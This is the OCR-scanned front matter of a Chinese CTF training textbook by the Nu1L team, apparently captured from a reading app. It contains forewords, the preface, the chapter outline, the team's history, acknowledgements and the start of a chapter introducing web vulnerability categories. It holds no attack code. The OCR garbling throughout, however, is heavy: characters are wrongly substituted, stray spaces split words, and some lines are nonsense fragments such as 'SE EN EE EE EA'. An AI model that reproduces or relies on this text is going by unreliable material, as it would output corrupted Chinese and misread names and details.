2021/1/16 从 0 到 1: CTFer 成 长 之 路 -Nu1L 战 队 - 微 信 读 书 


从 0 到 1: CTFer 成 长 之 路 
NU1EL 战队 

















El| 1 


CXFer 成 长 之 路 本 书 主 要 面向 CTF 入 1] 者 ， 融 入 了 CTF 比 赛 的 万 万 面 面 ， 让 读者 可 以 进行 系统 性 的 学 习 。 本 书包 括 13 章 的 内 容 ， 技 
术 介 绍 分 为 线 上 赛 和 线 下 赛 两 部 分 。 线 上 赛 包 括 10 章 ,涵盖 Web、PWN、Reverse、APK、Misc、( E 汪 2 
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内 容 简 介 


本 书 主要 面向 CTF 入 门 者 ， 融 入 了 CTF 比 赛 的 方方面面 ， 让 读者 可 以 进行 系统 性 的 学 习 。 本 书包 括 13 
章 内 容 ， 技 术 介 绍 分 为 线 上 赛 和 线 下 赛 两 部 分 。 线 上 赛 包 括 10 章 , 涵 匡 Web、PWN、Reverse、 
、Misc、Crypto、 区 块 链 、 代 码 审计 。 线 下 赛 包 括 ? 章 ， 分 别 为 AWD 和 靶场 渗透 。 第 13 章 通过 Nu1 
L 战 队 成 员 的 故事 和 联合 战队 管理 等 内 容 来 分 享 CTF 战 队 组 建 和 管理 、 运 莒 的 经 验 。 
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友 一 一 做 网 络 安全 竞 费 局 计量 友 展 的 推动 痢 


Nu1l 战 队 的 同学 们 编写 了 这 本 《从 0 到 1: CTFer 成 长 之 路 》， 和 希望 我 写 一 个 序 。 对 于 Nu11 战 队 ， 
的 了 解 主要 来 自 “ 强 网 杯 ” 全 国 网 络 安全 挑战 赛 和 “ 强 网 ”拟态 防御 国际 精英 邀请 赛 ， 在 这 两 个 国内 
很 优秀 的 竞赛 平台 上 ， 他 们 都 取得 了 很 好 的 成 绩 ， 也 为 拟态 防御 白 盒 测 试 做 了 很 多 工作 。 希 望 他 们 今 
后 继续 努力 ， 争 取 为 我 国 网 络 空间 安全 技术 创新 做 贡献 ; 也 希望 这 本 书 能 为 更 多 的 年 轻 人 学 习 、 掌 握 
网 络 空间 安全 知识 与 实践 技能 提供 帮助 ， 激 发 前 行 的 动力 。 


网络 空 间 的 竞争 ， 天 键 千 人 才 。 ” “网 络 安全 的 本 质 在 对 抗 ， 对 抗 的 本 质 是 攻防 两 闯 的 能 力 较 
量 。 ”这 些 重要 论述 说明 了 两 个 基本 问题 : 其 一 ， 人 是 网 络 安全 的 核心 ; 其 二 ， 提 高 人 的 能 力 要 靠 实 
践 锻炼 。 由 此 ， 网 络 安全 竞赛 对 于 提升 人 才 塔 养 质量 效益 具有 特殊 意义 。 从 2018 年 开始 ， 通 过 “ 强 网 
杯 ” 等 一 些 列 竞赛 的 推动 ， 我 国 网 络 安全 葛 赛 和 人 才 培 养 进入 了 一 个 车 勃 友 展 的 新 阶段 。 但 是 ， 我 们 
也 看 到 了 诸多 问题 ， 比 如 : 竞赛 质量 民 邯 不 齐 ， 竞 赛程 式 化 、 商 业 化 、 娱 乐 化 日 起 严重 ， 职 业 选 手 
束 是 “ 赛 棍 ”混迹 其 中 ,竞赛 和 人 才 培 养 、 产 业 发 展 相 脱 节 ， 等 寺 。 面 对 这 些 问题 ， 我 们 既 需 要 对 网 
ES EE 
务 技术 创新 的 初 心 和 本 源 上 。 


网 络 安 全 竞赛 局 质量 帮 展 ， 不 是 看 规模 有 多 大 ， 不 是 看 指导 单位 的 层级 有 多 高 ， 更 不 是 看 现场 有 多 人 么 
酷 炫 ， 而 是 要 看 究竟 解决 了 或 者 帮助 解决 了 什么 实际 问题 ， 看 实 实 人 在 在 取得 了 什么 效益 ， 看 对 网 络 空 
间 安 全 上 友 展 有 什么 实际 推动 作用 。 一 句 话 ， 高 质量 龙 展 的 核心 融 是 一 个 字 一 “ 实 ”。 


竞赛 要 与 人 才 培 养 相 结 合 。 当 前 ， 我 国 网 络 安全 人 才 培 养 还 处 于 一 个 逐步 成 熟 的 友 展 阶段 ， 其 中 最 大 
的 一 个 问题 是 谍 程 体系 和 实践 教学 体系 还 未 完全 形成 。 网 络 安全 竞赛 对 于 助 推 实践 教学 体系 形成 ， 瞧 
有 一 定 的 意义 ， 这 个 过 程 也 是 高 质量 帮 展 的 重要 基础 。 需 要 汇集 更 多 的 智慧 和 力量 ， 把 竞赛 中 的 技 
巧 、 经 验 上 升 到 教育 学 的 层面 ， 并 结合 理论 知识 架构 ， 升 华为 教学 体系 、 衍 化 为 实验 项 目 、 固 化 为 实 
践 平台 。 把 题目 抽象 为 科目 ， 才 会 有 更 大 的 普 适 性 ， 才 能 便于 更 多 的 人 学 习 、 实 践 网 络 安全 ， 竞 赛 
残 有 了 源源 不 断 的 竞技 者 ， 有 更 强 的 生命 力 。 这 个 工作 很 有 意义 ， 和 希望 大 家 广泛 参与 。 


竞赛 要 与 产业 友 展 相 结合 。 今 天 我 们 都 企 讲 新 工科 ， 那 么 什么 是 新 工科 ”新 工科 瓯 是 要 更 加 突出 “做 
中 学 ”。 建 设 新 工科 ， 需 要 产 教 避 合 ，“ 和 象牙 塔 (” 培 养 不 出 新 工科 人 人才。 网络 安 全 竞赛 ， 丈 是 要 染 起 
人 才 培 养 和 产业 发 展 之 间 的 一 座 桥梁 ， 为 产业 发 展 服务 ， 这 样 才 会 有 高 质量 友 展 的 动力 。 网 络 安 全 呐 
赛 需要 打破 当下 “大 而 全 ”“ 大 呼 隆 ” 的 局 面 ， 要 进行 “小 而 精 ” 的 变 草 ， 围 绕 专 门 领 域 、 细 分 产 
业 、 真 实 场景 设置 “赛场 ”， 不 断 强 化 指 册 性 、 针 对 性 ， 以 点 审 面 ， 汇 聚 更 多 的 企业 、 供 应 商 参 与 其 
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中 ， 增 加 产 教 融合 的 黏 性 。 和 希望 未 来 可 以 看 到 更 多 的 “专项 赛 ”， 这 也 需要 大 家 共同 努力 。 


竞赛 要 与 技术 创新 相 结合 。 网 络 安全 中 有 一 个 很 大 痛 点 ， 融 是 安全 性 难以 验证 ， 安 全 往往 处 于 目 说 目 
话 的 层面 。 我 曾经 多 次 讲 : “安全 不 安全 ，“ 日 帽 们 ”说 了 算 。 ”我 国 网 络 安全 技术 创新 还 有 很 长 的 
路 要 走 ， 网 络 安全 竞赛 应 该 任 这 个 进程 中 起 到 推动 作用 ， 这 是 高 质量 友 展 的 更 遍 目 标 。 我 们 举办 了 三 
届 “ 强 网 ”拟态 防御 精英 赛 ， 融 是 让 “ 昌 帽 们 ”都 来 打 擂 人 台 ， 为 内 生 安 全 技术 “ 挑 毛病 ”。 上 总 的 感 
部 ， 大 家 还 没有 使 出 全 力 、 拿 出 “绝活 ”， 这 里 有 赛制 需要 进一步 创新 的 问题 ， 也 有 这 类 比赛 的 土壤 
还 不 够 肥沃 的 问题 。 未 来 希望 大 家 多 到 紫金 山 来 打 比 赛 ， 共 同 推动 内 生 安 全 技术 友 展 。 


希望 Nu1l 战 队 和 更 多 CTFer 走 到 一 起 ， 不 但 做 网 络 安全 竞赛 的 芝 扩 者 ， 更 要 努力 做 网 络 安全 苋 赛 高 质 


量 友 展 的 推动 者 ， 携 起 手 来 为 网 络 强国 建设 添砖加瓦 。 
WV 


战略 支援 部 队 信息 工 程 大 学 
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友 一 一 住 网络 安全 实战 中 培 乔 人 才 


信息 网 络 已 渗透 到 社会 的 各 个 方面 ， 各 类 重要 信息 系统 已 成 为 国家 关键 基础 设施 。 而 网 络 空间 安全 问 
SE EN EE EE EA: Ee: 
人 才 培 养 问 题 已 成 为 当前 教育 界 、 学 术 界 和 产业 界 共同 关注 的 焦点 问题 。 


网 络 空间 安全 其 本 质 是 一 种 高 技术 对 抗 。 网 络 空间 安全 技术 主要 是 解决 各 类 信息 系统 和 信息 的 安全 保 
护 问 题 。 而 信息 技术 上 自身 的 快速 友 展 ， 也 必然 市 来 网 络 空间 安全 技术 的 快速 友 展 ， 其 需要 密码 学 、 数 
学 、 物 理 、 计 算 机 、 通 信 、 网 络 、 微 电子 等 各 种 科学 理论 与 技术 支撑 。 同 时 ， 安 全 的 对 抗 性 特 点 决定 
了 其 需要 根据 对 手 的 最 新 能 力 、 最 新 特点 而 采取 有 针对 性 的 防御 策略 ， 网 络 空间 安全 也 是 一 项 具有 很 
强 实 践 性 要 求 的 学 科 。 因 此 ， 网 络 空间 安全 人 才 塔 养 不 仅 需 要 重视 理论 与 技术 体系 的 传授 ， 还 需要 重 
视 实践 能 力 的 锻炼 。 


CTF (Capture The Flag) 比赛 是 网 络 空间 安全 人 才 培 养 方式 的 一 种 重要 探索 。CTF 比 赛 于 上 世纪 90 
年 代 起 始 于 美国 ， 近 年 来 引进 到 我 国 ， 并 得 到 了 业界 的 广泛 认可 和 支持 。 兴 趣 是 年 轻 人 学 习 的 最 好 动 
力 ，CTF 比 赛 很 好 地 将 专业 知识 和 比赛 乐趣 有 机 结合 。CTF 比 赛 通过 以 赛 题 夺 旗 方式 评估 个 人 或 团队 
的 网 络 攻防 对 抗 能 力 ， 参 赛 队 员 在 不 断 的 网 络 攻防 对 抗 中 争取 最 佳 成 绩 。 在 具体 的 赛 题 设置 上 综合 

NE 
需求 ;在 比赛 形式 上 ， 将 理论 知识 和 实际 攻防 相 结 合 ， 既 是 对 理论 知识 掌握 程度 的 评估 ， 也 是 对 动 

实践 能 力 、 知 识 灵活 应 用 能 力 的 考验 。 近 年 来 国内 的 CTF 比 赛 如 火 如 茶 ， 在 赛 题 设计 、 赛 制 设 定 等 方 
面 越 来 越 成 熟 ， 也 越 来 越 完 善 。 当 前 ， 参 与 CTF 比 赛 几乎 已 成 为 网 络 空间 安全 本 科学 习 的 必要 经 历 。 

内 的 各 种 CTF 比 赛 在 吸引 网 络 空间 安全 人 才 ， 引 导 网 络 空间 人 才 培 养 方面 发 挥 了 重要 作用 。 


对 于 天 注 CTF 比 赛 的 同学 ， 本 书 是 一 份 重要 的 参考 俊 料 。 本 书 作 者 Nu1L 战 队 是 CTF 赛 场 上 的 劲旅 ， 展 
次 在 CTF 比 赛 中 取得 骄 人 战绩 ， 具 有 丰富 的 CTF 比 赛 经 验 和 队伍 建设 经 验 。 结 合 其 多 年 的 比赛 经 验 和 
对 网 络 空间 安全 理论 与 技术 体系 的 理解 和 认识 ， 本 书 对 CTF 比 赛 的 线 上 赛 、 线 下 赛 等 所 涉及 的 密码 
学 、 软 件 漏洞 、 区 块 链 等 题 型 和 关键 知识 点 进行 了 思 结 ， 并 分 享 了 Nu1l 战 队 的 团队 友 展 经 验 。 通 过 
本 书 不 仅 可 以 较为 系统 地 学 习 和 擎 握 网 络 空间 安全 相关 基础 知识 ， 还 可 以 从 中 学 习 和 借 答 CTF 比赛 团 
队 的 组 建 和 培养 经 验 。 
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友 一 一 安全 竞 费 风 魅 力 己 价值 


作为 从 事 网 络 安全 研究 和 教学 多 年 的 教师 ， 也 作为 中 国 CTF 竞 赛 早期 的 参与 者 和 组 织 者 ， 我 很 荣 季 拱 
受 Nu1l 战 队 队 长 付 浩 的 邀请 ， 为 这 本 难得 的 CTF 竞 赛 参 考 书 撰写 序 。 


网 络 空间 安全 是 一 个 独 具 特 色 的 学 科 ， 研 究 的 是 人 与 人 之 间 企 网 络 空间 里 思维 和 智力 的 较量 ， 有 很 强 
的 对 抗 性 和 实践 性 。 不 同 于 抽象 的 理论 研究 ， 网 络 空 间 安 全 的 实践 性 要 求 我 们 不 仅 人 在 实验 室 ， 也 要 仁 
现实 的 互联 网 上 证 实 技术 的 可 行 性 ; 同时 ， 由 于 其 激烈 的 对 抗 性 ， 间 规 的 方法 往往 早已 成 为 低 垂 的 果 
实 ， 成 功 的 攻击 和 防 沁 都 必须 创新 、 另 辟 蹊 径 ， 也 往往 引人入胜 。 我 在 学 生 时 代 束 补 网 络 安全 的 魅力 
所 吸引 ， 至 今 从 事 网 络 安全 研究 和 教学 已 二 十 多 年 。 正 是 对 安全 研究 的 兴趣 驱动 着 我 去 探索 各 种 新 问 
题 和 新 方法 ， 至 今 热 情 不 减 。 


CTF (Capture The Flag) 竞赛 元 美 地 体现 着 网 络 空 间 安 全 这 种 智力 的 对 搞 性 和 技术 的 实践 性 。CTF 
EA EE AE 
动 。CTF 竞 赛 覆 盖 网 络 安 全 、 系 统 安全 和 密码 学 等 领域 ， 涉 及 协议 分 析 、 软 件 逆向 、 漏 洞 挖掘 与 利 


用 、 密 码 分 析 知 识 点 。 特 别 是 攻防 模式 的 CTF 竞 赛 给 参赛 者 一 种 类 似 实战 的 体验 ， 参 赛 者 要 上 友 现 并 利 
用 对 手 的 安全 漏洞 ， 同 时 防 沁 对 手 的 攻击 ， 对 自己 的 燥 识 和 技能 是 全 面 铂 炼 。 同 时 ，CTF 竞 赛 对 学 习 
网 络 空间 安全 学 科 的 学 生 或 技术 人 员 是 一 种 非 芝 好 的 学 习 和 训练 方式 。 


CTF 竞 赛 以 其 独特 的 魅力 吸引 了 一 批 批 安全 从 业者 目 帮 地 投身 其 中 。 我 和 我 的 学 生 在 十 多 年 前 开始 涉 
足 世界 CTF 竞 赛 ， 以 清华 大 学 网 络 与 信息 安全 实验 室 (NISL) 为 基地 ， 组 建 了 中 国 最 早 的 CTF 战 队 之 
一 一 一 监 连 化 (Blue-Lotus) ， 后 来 有 多 所 高 校 的 骨干 成 员 加 入 ， 曾 经 多 次 入 围 DEF CON 等 国际 著 
名 赛事 的 决赛 ， 并 与 0ops 战 队 一 起 取得 了 DEFCON 第 二 名 的 成 绩 。 后 来 ， 蓝 莲花 许多 队员 在 各 自 的 
高 校 成 立 了 独立 的 战队 ， 他 们 成 为 后 来 中 国 风起云涌 的 CTF 战 队 的 星星 之 火 。 如 今 ， 早 期 的 蓝 莲 花 队 
员 和 很 多 大 学 的 CTF 战 队 核 心 成 员 已 成 长 为 网 络 安 全 领域 的 精英 ,在 各 行 各 业 中 发 挥 了 中 流 破 柱 的 人 
用 。 


正 是 意识 到 CTF 在 实战 性 安全 人 才 培 养 中 的 重要 性 ， 我 和 同事 诸葛 建 伟 及 蓝 莲花 战队 的 队员 们 从 2014 
年 开始 组 织 了 国内 一 系列 的 CTF 竞 赛 和 后 来 的 全 国 CTF 联 赛 XCTF， 这 些 竞 赛 为 后 来 中 国 如 火 如 茶 的 
竞赛 培养 了 “群众 ”基础 。 近 年 来 的 “网 见 杯 ”“ 护 网 杯 ” 等 国家 级 安全 赛事 动 加 上 万 支队 伍 、 
万 名 队员 参赛 ， 银 行 、 通 信 等 不 少 行业 也 在 组 织 自己 行业 内 部 的 CTF 竞 赛 ， 教 育 部 的 大 学 生 信 息 安全 
竞赛 也 增加 了 CTF 形 式 的 “创新 实践 能 力 ” 比 赛 。 很 多 学 生 在 自己 报考 研究 生 或 找 工作 的 简历 上 写 上 
各 种 CTF 赛 事 的 成 绩 。 可 见 ，CTF 作 为 安全 人 才 塔 养 的 一 种 重要 形式 已 经 得 到 了 学 术 界 和 工业 界 的 认 
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可 。 


经 历 过 近年 来 CTF 溪 潮 各 种 竞赛 的 磨 练 ，NUu1L 战 队 已 经 成 为 长 期 活跃 佳 CTF 国 内 外 赛场 上 的 一 只 老 址 
劲旅 ， 在 国内 外 许多 重要 的 赛事 中 频频 取得 佳绩 。 并 不 像 电 葛 游戏 那 种 炫 酷 的 对 抗 游戏 ，CTF 竞 赛 培 
养 的 不 是 游戏 人 才 ， 而 是 现实 世界 的 精 瑞 。 像 付 举 一 样 ，Nu1L 战 队 的 许多 核心 成 员 已 经 成 长 为 安全 
行业 顶尖 的 专业 人 才 ， 成 为 我 国 网 络 空 间 安 全 领域 坚强 的 卫士 。 除 此 之 外 ， NURSEAJTNI_ 
、 裕 指针 等 一 系列 的 CTF 竞 赛 ， 为 国内 外 的 CTF 爱 好 者 提供 了 一 个 交流 的 平台 ， 为 CTF 社 区 的 上 太 展 做 
出 了 重要 贡献 。 


本 书 为 当前 众多 CTF 入 门 的 参赛 者 提供 了 一 份 不 可 多 得 的 参考 教材 。 由 于 CTF 才 关 知 识 点 庞 习 ， 而 且 
近年 来 赛事 题目 越 来 越 难 ， 对 于 CTF 入 门 的 选手 来 说 很 难 把 握 ， 市 面 上 系统 地 介绍 CTF 的 书目 前 并 不 
多 见 。 本 书 的 内 容 不 仅 覆 六 了 传统 CTF 线 上 、 线 下 赛 弟 见 的 知识 领域 ,如 Web 攻 防 、 闻 向 工程 、 漏 洞 
利用 、 密 码 分 析 等 ， 还 增加 了 AWD 攻 防 赛 、 区 块 链 等 新 的 内 容 。 特 别 是 本 书 最 后 加 入 了 Nu1L 战 队 的 
成 长 史 和 Nu1L 两 位 队员 的 故事 ， 融 入 了 付 浩 本 人 对 CTF 竞 赛 的 期 望 和 情怀 ， 其 中 关于 CTF 联 合 战队 管 
理 、 如 何 组 织 竞 赛 、 如 何 吸收 新 鲜血 液 等 内 容 ， 都 是 独一无二 的 。 这 些 内 容 融 合 了 Nu1L 整 个 团队 多 
年 的 知识 、 经 验 和 感情 。 我 相信 ， 本 书 不 仅 对 CTF 爱 好 者 学 习 技 术 有 重要 帮助 ， 也 对 CTF 战 队 的 组 织 
管理 者 提供 了 难得 的 参考 。 


最 后 感谢 Nu1L 战 队 为 CTF 和 安全 技术 爱好 者 贡献 的 这 本 精彩 的 参考 书 ， 相 信 它 对 安全 技术 及 CTF 竞 赛 
成 绩 的 提高 都 会 很 有 帮助 。 


2020 年 8 月 
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随 着 日 益 严 峻 的 网 络 安全 形势 及 人 们 对 网 络 安全 重视 程度 的 提高 ， 以 人 才 友 现 、 培 养 和 选拔 为 目的 的 
网 络 安全 赛事 不 断 涌现 ， 成 为 上 友 现 人 才 的 一 种 创新 形式 。 目 前 ， 国门 高 人 于 的 网 络 安全 赛事 间 明 上- 
形式 存在， 竞赛 水 平 差 异 较 大 ， 直 接 参 加 高 于 上 自身 拉 术 过 多 的 苋 赛 犹 如 空中 楼 阁 ， 不 仅 很 难 学 到 东 
P=/ d=: 
全 技术 、 计 算 机 技术 、 硬 件 技术 等 领域 ， 内 容 十 分 繁杂 ， 和 过 代 更 新 时 间 快 ， 初 学 者 往往 一 头 雾 水 地 参 
与 其 中 ， 难 以 友 现 CTF 的 乐趣 。 


早 人 在 2017 年 ， 我 便 有 写 一 本 供 急 学 者 学 习 CTF 书 籍 的 想法 ， 但 由 于 当时 Nu1L 战 队 的 成 员 太 少 ， 并 有 
名 得 这 是 一 个 复杂 而 且 庞 大 的 过 程 ， 所 以 写 书 的 想法 只 能 搁浅 。 直 到 2018 年 末 ，Nu1L 战 队 已 成 长 到 
近 40 人 ， 与 此 同时 ,我 发 现 市 面 上 依然 没有 一 本 关于 CTF 比 赛 的 书籍 ， 写 书 的 想法 又 重新 燃 起 ， 在 询 
Id EA DD UU 


经 过 初步 讨论 ， 我 们 希望 这 本 书 可 以 让 CTF 和 NN] 者 进行 系统 性 的 学 习 ， 于 是 决定 尽 可 能 地 将 CTF 比 赛 
中 的 方方面面 融入 此 书 。 同 时 ， 为 了 避免 这 本 书 成 为 一 本 只 是 罗列 知识 点 的 普通 安全 基础 书籍 ， 除 了 
围绕 CTF 涉 及 的 大 量 知识 点 ， 我 们 还 将 做 题 的 技巧 、 个 人 经 验 穿插 其 中 ， 以 便 让 读者 更 好 地 融入 。 除 
了 技术 层面 的 内 容 ， 我 们 还 会 介绍 Nu1L 战 队 的 成 长 史 和 联合 战队 的 管理 经 验 。 


本 书 旨 在 让 更 多 人 感受 到 CTF 比 赛 的 乐趣 ， 对 CTF 比 赛 有 所 了 解 ， 进 而 通过 本 书 提升 自身 的 技术 实 
力 。 


本 书 结构 


本 书 的 技术 分 享 包括 CTF 线 上 赛 和 线 下 赛 两 部 分 。 如 此 分 类 是 为 了 让 此 书 的 适用 面 更 加 广泛 ， 除 了 与 2 
比赛 相关 的 内 容 ， 我 们 还 结合 实战 ， 为 读者 分 享 一 些 现实 漏洞 挖掘 的 经 验 。 


CTF 线 上 赛 包括 10 章 ， 涵 盖 Web、PWN、Reverse、APK、Misc、Crypto、 区 块 链 、 代 码 审计 。 本 
部 分 肖 盖 了 CTF 大 部 分 的 题目 分 类 ， 并 配 有 相应 的 例题 解析 ， 能 够 让 读者 充分 了 解 、 学 习 相应 知识 
点 。 同 时 ， 在 实际 比赛 中 ， 本 书 的 内 容 也 可 以 作为 参考 。 


CTF 绪 下 赛 包括 2 章 ， 分 别 为 AWD 和 半 场 渗透 。 其 中 ，AWD 章 节 从 比赛 技巧 和 流 量 分 析 方 面 进行 了 深 
入 介绍 ; 靶场 渗透 章节 贴 合 现实 ， 读 者 阅读 时 可 以 结合 实际 ， 从 中 有 所 收获 。 


最 后 一 章 的 内 容 与 技术 无 关 ， 只 是 分 享 发 生 在 Nu1l 战 队 中 的 故事 和 联合 战队 管理 等 。 在 开始 写 书 之 
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前 ,我 也 进行 了 简单 调研 ,相当 一 部 分 人 会 对 战队 管理 和 CTF 的 意义 有 所 好 奇 ， 这 部 分 是 我 的 经 验 之 
谈 ， 希望 对 读者 有 所 帮助 。 


读者 对 象 
本 书 适合 的 读者 包括 : 
学 想 入 门 CTF 比 赛 的 读者 。 


合 
2 


入 | ]CTF 陷 入 手 须 的 读者 。 


已 4 
%» 希望 成 立 战队 、 管 理 战队 的 读者 。 


令 不 和 锭 CTF 如 何 与 现实 接轨 的 读者 。 
多 没 参加 过 线 下 赛 却 突然 要 参加 的 读者 。 
说 明 


众多 周知 ，CTF 涉 及 的 分 类 十 分 繁多 ， 所 以 Nu1l 战 队 有 29 人 参与 了 此 书 的 编写 ， 每 个 人 负责 编写 不 
同 的 章节 ， 在 编写 前 我 已 尽 可 能 地 统一 了 规 沁 ， 但 是 每 个 人 的 编写 风格 不 是 完全 一 至 ， 所 以 有 的 章节 
文字 风格 差异 较 大 。 


参与 编写 此 书 的 Nu1L 战 队 的 成 员 都 是 第 一 次 写 书 ， 因 此 不 能 保证 本 书 能 够 面面俱到 ， 但 尽 可 能 详细 
地 涵 兰 了 CTF 比 赛 的 相应 内 容 ， 人 至 于 某 毕 未 能 摘 述 详尽 或 遗漏 的 地 方 ， 以 及 一 些 不 荣 见 的 领域 ， 如 工 
控 CTF， 因 为 缺乏 相关 知识 ， 所 以 没有 办 法 加 入 本 书 。 


本 书 主 要 针对 CTF 初 学 者 ， 究 其 每 部 分 ， 认 真 写 的 话 都 足以 写 一 本 书 。 所 以 我 们 也 对 各 部 分 的 内 容 进 
行 了 筛选 ， 只 编写 常见 的 CTF 技 术 点 ， 如 Web 部 分 的 SQL 注入 章节 中 只 写 了 My9SQL 下 的 注入 场景 ， 而 
没有 写 SQL Server、NoSQL 等 情况 下 的 注入 场景 。 


| 以 上 情况 希望 读者 能 够 理解 。 
关于 Nu1L 战 队 


Nu1L 战 队 成 立 于 2015 年 10 月 ， 源 于 英文 单词 NULL， 是 国内 顶尖 的 CTF 联 合 战队 ， 目 前 成 员 有 60 余 
人 ， 官 网 为 https://nu1l.com。 


Nu1L 目 成 立 以 来 ， 征 战 于 国内 外 各 项 CTF 赛 事 ， 成 绩优 异 ， 如 : 


学 DEFCON CHINA&BCTF2018 贡 年。 
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令 TCTF2018 总 决赛 获得 全 球 第 四 名 ， 国 内 第 一 名 。 
们 LCTF、SCTF 连 续 三 年 冠军 。 

eA 3 nt 

eA 

A (Gh 


4 N1CTF 国 际 赛事 组 织 者 ， 其 中 2019 年 CTFTIME 评 分 权重 获得 满分 ， 获 得 全 球 CTF 爱 好 者 ; 
评 。 


多 2019 年 11 月 ， 与 春秋 GAME 共同 负责 运 维 “ 赢 峰 极 客 ” 线 下 城市 靶场 赛 。 
人 2019 年 11 月 ， 创 建 “ 空 指针 ”高 质量 挑战 赛 (https://www.npointer.cn) 。 


战队 部 分 成 员 为 Blackhat、HITCON、KCON、 天 府 杯 等 国内 外 安全 会 议 演 讲 者 ， 参 与 PWN2 
、GEEKPWN 等 国际 性 漏洞 破解 赛事 。 部 分 核心 队员 效力 于 Tea Deliverers、eee 战 队 。 


DI:1ele) 名 本 二 | 


为 了 让 读者 更 好 地 学 习 本 书 的 内 容 ， 我 们 针对 大 部 分 知识 点 设计 了 相应 的 配套 题目 ， 以 便 辅助 读者 学 
习 并 理解 相关 知识 ， 我 们 称 之 为 N1BOOK (https://book.null.com) 。 


书 中 Web、PWN 章 节 涉 及 的 题目 已 封闭 成 docker 镜 像 ， 读 者 在 N1BOOLK 平 台 上 选择 相应 页 面 ， 即 6 
访问 题目 的 相关 内 容 ， 通 过 docker 的 司 动 ， 免 去 了 读者 在 本 地 搭建 环境 的 吾 恼 。 而 其 余 章节 的 题目 ， 
如 Misc、 靶 场 渗透 等， 其 附件 或 镜像 包 已 上 传 到 云 上 ， 读 者 可 以 在 N1BOOK 平 台 上 下 载 。 


本 书 配套 题目 默认 的 flag 格 式 为 n1bookf ， 相 应 题目 的 Writeup 可 根据 题目 页 面 中 的 关键 词 ， 在 Nu1 
L Team 官 方 公 众 号 回复 获取 ， 扫 摘 下 方 的 二 维 码 ， 可 以 关注 官方 公众 号 。 
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意见 反馈 


本 书 是 我 们 团队 的 诈 次 兰 坛 ， 难 免 有 不 足 之 处 ， 读 者 知 有 任何 建议 ， 可 以 通过 邮件 联系 我 们 : boo 
@nu1l.com， 我 们 会 在 下 一 版 本 中 进行 参考 和 修改 。 


致谢 


出 书 是 一 个 十 分 庞大 的 工程 ， 因 为 CTF 涉 及 的 技术 点 众多 ， 所 以 本 书 的 编写 汇聚 了 国内 外 诸多 安全 研 
究 员 的 文章 及 一 些 公开 发 表 的 书籍 、 人 研究 成 果 等 ， 在 此 首先 表示 感谢 。 


感谢 名 江 兴 院士 、 冯 登 国 院士 、 清 华 大 学 段 海 新 教授 为 本 书 作 序 


感谢 CongRong ( 河 图 安全 、vulhub 核 心 成 员 ，Symbo1 安 全 团队 负责 人 ) 、Forzalnter ( 国 网 山东 
EEDAVNSIICE: EA (ChaMd5 安 全 团队 创始 人 ) 、tomato (边界 无 限 联合 创始 
人 ) 、walk ( 奇 安信 奇 物 安全 实验 室 负 责 人 ) 、 于 易 (TK) (腾讯 又 武 实验 室 创 始 人 ) 、 马 坤 (四 | 
草 安 全 ) 、 王 任 飞 (avfisher) ”( 某 知名 云 厂 商 Offensive Security Team 负 责 人 ) 、 王 依 民 (Valo) 


(退役 老年 CTF 选 手 / 红 蓝 对 抗 领域 专家 ) 、 王 欣 ( 安 恒 信息 安全 研究 院 ) 、 王 表 (WCTF 世 界 黑客 大 
师 赛 运 言 负责 人 ) 、 幻 录 ( 永 信 公 减 KR 实验 宇 ) 、 叶 猛 (和 奇 安 信和 高 级 攻防 部 负责 人 ) 、 刘 炎 明 人 
) (blue-lotus 战 队 成 员 ) 、 刘 新 鹏 (恒安 嘉 新 水 滴 攻 防 安全 实验 室 &DefCon Group 0531 发 起 
人 ) 、 杨 义 先 (北京 邮电 大 学 教授 ) 、 杨 坤 (长 之 科技 ) 、 吴 石 (腾讯 科恩 实验 宇 负 责 人 ) 、 末 方 窒 
(MaskRay) (LLVM 开 发 者 /LLD 维 护 者 ) 、 张 小 松 (电子 科技 大 学 教授 ，2019 国 家 科技 进步 一 
奖 第 一 完成 人 ) 、 张 瑞 冬 (only_ guest) (PKAV 技 术 团 队 创 始 人 、 无 糖 信息 CEOQ) 、 张 基 (公众 号 
网 安 隶 谈 创 办 人 、 山 东 和 警察 学 院 ) 、 周 世 杰 (电子 科技 大 学 教授 ) 、 周 景 平 ( 黑 哥 ) (知道 创 字 404 
SvE 二 局 2 寺 乓 I 
Oy EE 
全 学 院 教授 ) 、 黄 昱 恺 ( 火 日 攻 天 ) (退役 老年 CTF 选 手 / 某 知 名 云 厂商 SDL 安 全 专家 ) 、 黄 源 (知名 
l= = 6 
秋 GAME 负 责 人 ) 、 鲁 辉 (中 国 网 络 空间 安全 人 才 教 育 论坛 秘书 长 ) 、 管 舌 (公安 部 第 一 研究 所 ， 网 
络 攻防 实验 宇 主 任 ) 为 本 书 撰 写 推 荐 语 (排名 不 分 先后 ， 按 姓氏 笔画 排序 ) 。 


感谢 Nu1L 战 队 的 其 他 28 位 参与 编写 的 队员 ， 利 用 上 自己 的 业余 时 间 保 质保 量 地 完成 了 上 自己 负责 的 部 
分 ， 他 们 分 别 是 姚 碱 、 李 了 明 建 、 管 云 超 、 孙 心 效 、 李 建 旺 、 于 晨 升 、 吴 于 航 、 陈 溜 光 、 林 镇 鹏 、 刘 
轶 、 母 浩 文 、 鲜 枕 牌 、 李 柯 、 秦 琦 、 钱 包 冰 、 阳 玫 鹏 、 郑 言 安 、 黄 伟 杰 、 李 依 林 、 赵 畅 、 饶 诗 梳 、 周 
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获 怠 、 李 扬 、 何 表 杰 、 段 景 漆 、 林 浊 儒 、 周 捷 、 徐 石 。 


特别 感谢 电子 工业 出 版 社 的 章 海 涛 老师 及 其 团队 ， 是 他 们 专业 的 指导 和 对 二 的 编辑 ， 才 使 本 书 最 终 < 
广大 读者 见面 。 


最 后 由 衷 地 感谢 在 Nu1l 战 队 成 立 的 这 些 年 来 ， 相 信 、 支 持 、 帮 助 过 我 们 的 诸位 。 
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2020 年 8 月 


https://weread.qq.com/web/reader/77d32500721a485577d8eeek8f132430178f14e45fce0f7 





2021/1/16 从 0 到 1: CTFer 成 长 之 路 -Nu1L 战 队 - 微 信 读 书 


CTF 之 线 上 赛 


第 1 章 Web 入 门 


在 传统 的 CTF 线 上 比赛 中 ，Web 类 题目 是 主要 的 题 型 之 一 ， 相 较 于 二 进 制 、 逆 向 等 类 型 的 题目 ， 人 参赛 
者 不 需 掌握 系统 底层 知识 ; 相 较 于 密码 学 、 杂 项 问题 ， 不 需 具 特别 强 的 编程 能 力 ， 故 入 门 较为 容易 。 
Web 类 题目 常见 的 漏洞 类 型 包括 注入 、XSS、 文 件 包 含 、 代 码 执行 、 上 传 、SSRF 等 。 


